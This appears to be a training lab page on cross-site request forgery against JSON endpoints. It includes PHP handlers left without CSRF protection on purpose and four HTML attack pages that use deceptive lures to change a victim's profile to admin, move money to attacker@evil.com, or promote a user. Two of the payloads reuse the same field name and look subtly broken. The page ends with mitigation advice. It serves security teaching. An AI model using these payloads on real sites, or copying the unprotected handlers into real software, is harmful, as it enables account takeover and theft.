Lab 4: CSRF with JSON Payloads

CSRF attacks using JSON payloads

Difficulty: High

Lab Overview

This lab demonstrates CSRF vulnerabilities that can be exploited using JSON payloads. Many modern web applications accept JSON data, and attackers can craft malicious JSON payloads to perform unauthorized actions.

Objective: Use JSON payloads to perform CSRF attacks and bypass traditional form-based protections.

Vulnerable Code 
// Vulnerable: No CSRF protection on JSON API
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['json_api'])) {
    $json_data = $_POST['json_data'] ?? '';
    $decoded_data = json_decode($json_data, true);
    
    // Process JSON data without CSRF validation
    $_SESSION['api_data'][] = [
        'data' => $decoded_data,
        'timestamp' => date('Y-m-d H:i:s')
    ];
}

// Vulnerable: Profile update via JSON
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['json_profile_update'])) {
    $json_profile = $_POST['json_profile'] ?? '';
    $decoded_profile = json_decode($json_profile, true);
    
    // Update profile without CSRF validation
    $_SESSION['user_profile'] = array_merge($user_profile, $decoded_profile);
}
JSON API Status
Current Profile

Username: victim_user

Email: victim@example.com

Role: user

Balance: $1,000.00

API Requests (0)

No API requests yet.

JSON API Request
Profile Update via JSON
Money Transfer via JSON
Admin Action via JSON
Vulnerability Details
  • Type: CSRF with JSON Payloads
  • Severity: High
  • Method: POST
  • Issue: No CSRF protection on JSON API endpoints
JSON CSRF Attack Examples
  • json_csrf.html - Basic JSON CSRF attack
  • json_profile_csrf.html - Profile update via JSON
  • json_transfer_csrf.html - Money transfer via JSON
JSON CSRF Attack Payloads

Create these malicious HTML files to test JSON CSRF attacks:

1. Basic JSON CSRF (json_csrf.html):
<html> <body> <h1>API Integration Test</h1> <form action="http://localhost/test/csrf/4.php" method="POST"> <input type="hidden" name="json_api" value="1"> <input type="hidden" name="json_data" value='{"action": "hack", "data": "malicious"}'> <input type="submit" value="Test API"> </form> </body> </html>
2. Profile Update JSON CSRF (json_profile_csrf.html):
<html> <body> <h1>Profile sync required!</h1> <form action="http://localhost/test/csrf/4.php" method="POST"> <input type="hidden" name="json_profile_update" value="1"> <input type="hidden" name="json_profile" value='{"username": "hacked_user", "email": "hacker@evil.com", "role": "admin"}'> <input type="submit" value="Sync Profile"> </form> </body> </html>
3. Money Transfer JSON CSRF (json_transfer_csrf.html):
<html> <body> <h1>Payment processing update!</h1> <form action="http://localhost/test/csrf/4.php" method="POST"> <input type="hidden" name="json_transfer" value="1"> <input type="hidden" name="json_transfer" value='{"amount": 500, "recipient": "attacker@evil.com"}'> <input type="submit" value="Process Payment"> </form> </body> </html>
4. Advanced JSON CSRF with JavaScript:
<html> <body> <h1>Advanced JSON CSRF Attack</h1> <script> // Create JSON payload var jsonPayload = { "action": "admin_action", "data": { "command": "promote_user", "target": "attacker" } }; // Send JSON request fetch('http://localhost/test/csrf/4.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'json_admin=1&json_admin=' + encodeURIComponent(JSON.stringify(jsonPayload)) }); </script> </body> </html>
Real-World Attack Scenarios
Mitigation Strategies
  • Implement CSRF tokens for all JSON API endpoints
  • Use proper Content-Type validation for JSON requests
  • Implement request origin validation and CORS policies
  • Use SameSite cookie attributes
  • Implement proper API authentication and authorization
  • Regular security testing and vulnerability assessments
  • Monitor for unusual JSON request patterns and anomalies